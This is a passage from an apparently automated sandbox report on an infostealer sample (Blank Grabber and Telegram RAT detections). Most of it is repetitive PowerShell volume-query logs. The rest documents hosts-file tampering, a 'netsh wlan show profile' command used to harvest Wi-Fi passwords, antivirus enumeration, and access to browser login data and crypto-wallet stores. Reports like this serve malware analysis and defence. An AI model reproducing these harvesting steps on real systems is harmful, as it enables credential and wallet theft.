              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA6C0A8 GetSystemTime,SystemTimeToFileTime,109_2_00007FF6FAA6C0A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA648CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,109_2_00007FF6FAA648CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Modifies the hosts file
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000004.00000003.2878432052.000000000838F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2886083384.0000000007480000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2051169917.00000000050F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2051169917.00000000050F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: KpHYfxnJs6.exe PID: 7320, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: KpHYfxnJs6.exe PID: 7732, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI73202\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: KpHYfxnJs6.exe PID: 7732, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal WLAN passwords
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
